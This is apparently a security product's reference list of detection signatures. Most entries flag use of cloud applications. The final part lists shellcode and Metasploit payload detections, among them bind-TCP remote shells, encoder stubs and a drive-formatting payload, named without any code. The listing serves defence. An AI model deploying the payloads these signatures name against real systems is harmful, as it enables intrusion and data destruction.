Description: coAction provides an on demand business collaboration service as a platform for rich business applications called coApps. coApps are linked applications used by Sales, Customer Service, Finance and others to organize and collaborate, using the services of the cloud. Manage and Collaborate all your work from a single Workspace.
Back to top

Coalfire

About this situation: Application Coalfire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Coalfire provides cyber risk management and compliance services for enterprises and government organizations.
Back to top

CobaltIron

About this situation: Application CobaltIron detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cobalt Iron delivers cloud backup for business data protection.
Back to top

CobaltPM

About this situation: Application CobaltPM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CobaltPM is a cloud-based project and portfolio management software for teams to plan and manage projects across your entire organization.
Back to top

Cobot

About this situation: Application Cobot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cobot is a web-based management application made specifically for coworking spaces.
Back to top

CobWeb

About this situation: Application CobWeb detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cobweb - independent Hosted Exchange provider gives instant, secure access to email, calendar and contacts via desktop computer, laptop or mobile device.
Back to top

Cocolog-Nifty

About this situation: Cocolog Nifty usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese blogging service that allows users to write and read content.
Back to top

Code-Academy

About this situation: Application Code-Academy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Codecademy is an online interactive platform that offers free coding classes in 12 different programming languages including Python, Java, PHP, JavaScript (jQuery, AngularJS, React.js), Ruby, SQL, and Sass, as well as markup languages HTML and CSS.
Back to top

Code-Climate

About this situation: Code Climate usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Code Climate consolidates the results from a suite of static analysis tools into a single, real-time report, giving your team the information it needs to identify hotspots, evaluate new approaches, and improve code quality.
Back to top

Code-School

About this situation: Application Code-School detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Code School is an online learning platform that teaches programming and web design skills via video, in-browser coding and gamification.
Back to top

Code42

About this situation: Application Code42 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1599-5242
Description: Code42 backup software back up and store personal, business and enterprise data securely - offsite, onsite and online in the Cloud.
Back to top

Codeanywhere

About this situation: Application Codeanywhere detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Codeanywhere is online code editor with syntax highlighting and a FTP client.
Back to top

Codebase

About this situation: codebase usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Codebase Supports Git, Mercurial and Subversion repositories. Codebase is needed for any software team. Anyone can easily deploy code from your Codebase repositories to your FTP, SSH or cloud-based servers
Back to top

CodebaseHQ

About this situation: Application CodebaseHQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Codebase provides fully featured, fast, reliable secure Git, Subversion Mercurial hosting for projects. Codebase's ticketing system allows you to manage all the tasks associated with your project. Tickets can be updated easily by developers and project managers at the click of a mouse.
Back to top

Codentia

About this situation: Application Codentia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Codentia provides subscription based eCommerce solution for small to medium businesses.
Back to top

Codenvy

About this situation: Application Codenvy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Codenvy - Industrial-strength Saas Developer Environments for developers and corporate teams with advanced collaboration, security, and enterprise options.
Back to top

CodePlex

About this situation: Application CodePlex detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CodePlex is an open source project hosting website. It allows shared development of open-source software. CodePlex is a website where engineers and computer scientists share projects and ideas.
Back to top

CodeProject

About this situation: Application CodeProject detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Codeproject is a community of Software Developers, resource for answers to coding questions
Back to top

Cogentys

About this situation: Application Cogentys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cogentys specializes in learning management systems. Accessible via the organization's personalized web portal, employees can satisfy compliance and training requirements either through existing E-learning products, or by designing a courses that meets the specific needs of the organization.
Back to top

Coin-Cafe

About this situation: Application Coin-Cafe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Coin Cafe is a service that helps users to get bitcoin.
Back to top

Coinapult

About this situation: Application Coinapult detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Coinapult is a Bitcoin service company that provides
Back to top

Coinbase

About this situation: Application Coinbase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Coinbase is a bitcoin wallet and platform where merchants and consumers can transact with the digital currency bitcoin.
Back to top

Coinify

About this situation: Application Coinify detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Coinify is an android app that delivers ads mobile device and pays for receiving push notifications.
Back to top

CoinJar

About this situation: Application CoinJar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CoinJar is a personal finance account that lets you buy, sell and spend bitcoin.
Back to top

Coins-global

About this situation: Application Coins-global detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Construction Industry Solutions
Back to top

Coins.ph

About this situation: Application Coins.ph detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Coins.ph is a financial services platform. Coins.ph provides person-to-person wallet transfers, bill payments, mobile top-ups, online shopping, and remittance services. Its cash delivery network covers tens of thousands of banks, pawnshops, payment outlets, and door-to-door delivery across the region.
Back to top

CollabNet

About this situation: Application CollabNet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CollabNet is provider of Enterprise Cloud Development and Agile ALM products and services for software-driven organizations.
Back to top

Collaboration - Office

About this situation: Office Category used to manage the Office domain:
Context: URL Application Context
Severity: 1
Tags: Collaboration - Office, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Office Category used to manage the Office domain:
Back to top

CollabSpot

About this situation: Application CollabSpot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CollabSpot Insights gives users the power to manage Highrise customer data directly in Gmail (log emails, create leads, ...)
Back to top

Columbus

About this situation: Application Columbus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Columbus is an international consultancy serving customers. It develops software which is tailored to companies within the food, retail and manufacturing industries. Its software ensures operational through enhanced automation.
Back to top

Columnit

About this situation: Application Columnit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Column Technologies is a technology and software provider specializing in business service and process management for public and commercial markets. Column's success comes from long-term relationships, aligning goals with its customers, and a collaborative approach that integrates people, process, technology, and support.
Back to top

Comarch-Loyalty-Management

About this situation: Application Comarch-Loyalty-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cloud based IT solution for running loyalty and rewards programs across multiple industries including: Airlines, Retail, Hospitality, Telecommunications, and Banking.
Back to top

Comcast-Webmail

About this situation: Comcast Webmail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: Web based mail provided by Comcast.
Back to top

Comcity

About this situation: Application Comcity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Comcity is support and cloud solutions company provider in Melbourne.
Back to top

Comdata

About this situation: Application Comdata detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Comdata offers integrated financial solutions that are changing the way companies manage data, pay employees, process transactions, and manage spending on key business purchases.
Back to top

Comeet

About this situation: Application Comeet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Comeet is the collaborative recruiting platform. It helps recruiters and office admins to manage the candidate pipeline, delegate tasks and interviews to team members and track hiring health.
Back to top

Cometdocs

About this situation: Application Cometdocs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Cometdocs converts and creates PDF, Text, Images, Word, Excel and other file and Microsoft formats.
Back to top

Comindware-Project

About this situation: Application Comindware-Project detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Comindware helps to improve your Project Management experience with Predictive Real-Time Gannt Chart and Automated Priority-based Planning.Collaborate with the project team and beyond - built on the top of Comindware Team Network platform, Comindware Project provides collaboration capabilities in the context of projects.
Back to top

CoMindWork

About this situation: Application CoMindWork detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Comindwork is an online environment and set of tools for effective and convenient collaborative work of knowledge workers. It contains many Web 2.0 (Enterprise 2.0) tools, which are easily mastered by new users: wiki pages, blogs, tasks, documents, search, tags and associations.
Back to top

Comixology

About this situation: Application Comixology detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ComiXology is a cloud-based digital comics platform. It offers a selection of comic books and graphic novels across Android, iOS, Kindle, Windows 8, and the Internet.
Back to top

Comm100

About this situation: Application Comm100 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Comm100 is provider of live chat, email marketing and help desk software.
Back to top

Commence-Online-CRM

About this situation: Application Commence-Online-CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: On-Line CRM Software solution for businesses of 5 to 200 users that includes Contact Management, Activity Management, Sales Management, Lead Management, Marketing, Customer Service, Project Management and Reporting. Cloud based use with Mac, PC or Tablet.
Back to top

CommerceHub

About this situation: Application CommerceHub detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CommerceHub is a provider of hosted integration, drop ship fulfillment, and product content management for multi-channel e-commerce merchants.
Back to top

Commission-Junction

About this situation: Application Commission-Junction detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CJ Affiliate by Conversant is an online advertising company, operating in the affiliate marketing industry, which operates worldwide.
Back to top

CommonOffice

About this situation: Application CommonOffice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CommonOffice.com offers powerful web-based teamware applications that can be tailored to fit your company's specific needs and requirements
Back to top

Common_Generic-Shellcode-1

About this situation: Generic shellcode detection
Context: ANY Common Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Generic-Shellcode-2

About this situation: Generic shellcode detection
Context: ANY Common Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Generic-Shellcode-Encoder-1

About this situation: Generic shellcode encoder detection
Context: ANY Common Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Generic-Shellcode-Encoder-2

About this situation: Generic shellcode encoder detection
Context: ANY Common Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Generic-Shellcode-Encoder-3

About this situation: Generic shellcode encoder detection
Context: ANY Common Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Generic-Shellcode-Encoder-4

About this situation: Generic shellcode encoder detection
Context: ANY Common Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Generic-Shellcode-Encoder-5

About this situation: Generic shellcode encoder detection
Context: ANY Common Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Generic-Shellcode-Encoder-6

About this situation: Generic shellcode encoder detection
Context: ANY Common Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Generic-Shellcode-Encoder-7

About this situation: Generic shellcode detection
Context: ANY Common Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Payload-Windows-x64-Exec

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1610-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Payload-Windows-x64-Messagebox

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1610-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Payload-Windows-X86-Format-All-Drives

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1610-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Payload-Windows-X86-Messagebox

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1610-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Payload-Windows-X86-Shell-Bind-TCP-Xpfw

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1610-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Payload-Windows-X86-Speak-Pwned

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1610-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-Java

About this situation: Metasploit Java shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1592-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-MIPS-Byte-Longxor

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1595-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-MIPS-Byte-Xori

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1595-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x64-Xor-Context

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1595-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x64-Xor-Dynamic

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1595-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x64-Xor-Stub

About this situation: Metasploit x64/xor shellcode encoder stub detected
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1592-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x64-Zutto-Dekiru

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Add-Sub-Stub

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1592-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Alpha-Mixed-Stub

About this situation: Metasploit x86/alpha_mixed shellcode encoder stub detected
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1591-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Alpha-Upper-Stub

About this situation: Metasploit x86/alpha_upper shellcode encoder stub detected
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1591-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Avoid-Underscore-Stub

About this situation: Metasploit x86/avoid_underscore shellcode encoder stub detected
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1592-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Avoid-Utf8-Tolower-Stub

About this situation: Metasploit x86/avoid_utf8_tolower shellcode encoder stub detected
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1591-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Bloxor-Stub

About this situation: Metasploit x86/bloxor shellcode encoder stub detected
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-BMP-Polyglot-Stub

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1592-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Call4-Dword-Xor-Stub

About this situation: Metasploit x86/call4_dword_xor shellcode encoder stub detected
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1591-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Countdown-Stub

About this situation: Metasploit x86/countdown shellcode encoder stub detected
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1591-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Fnstenv-Mov-Stub

About this situation: Metasploit x86/fnstenv_mov shellcode encoder stub detected
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1591-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Jmp-Call-Additive-Stub

About this situation: Metasploit x86/jmp_call_additive shellcode encoder stub detected
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1592-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-NonAlpha-Stub

About this situation: Metasploit x86/nonalpha shellcode encoder stub detected
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1591-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-NonUpper-Stub

About this situation: Metasploit x86/nonupper shellcode encoder stub detected
Context: ANY Common Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1396-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Opt-Sub-Stub

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1592-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Service-Stub

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1595-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Shikata-Ga-Nai-Stub

About this situation: Metasploit x86/shikata_ga_nai shellcode encoder stub detected
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Single-Static-Bit-Stub

About this situation: Metasploit x86/single_static_bit shellcode encoder stub detected
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1592-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Unicode-Mixed-Stub

About this situation: Metasploit x86/unicode_mixed shellcode encoder stub detected
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1591-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Unicode-Upper-Stub

About this situation: Metasploit x86/unicode_upper shellcode encoder stub detected
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1591-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Shellcode-x86-Xor-Dynamic-Stub

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1595-5242
Vulnerability: Shellcode-Encoder
Description:
Back to top

Common_Metasploit-Stager-Linux-Armle-Bind-TCP

About this situation: Metasploit shellcode detection
Context: ANY Common Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
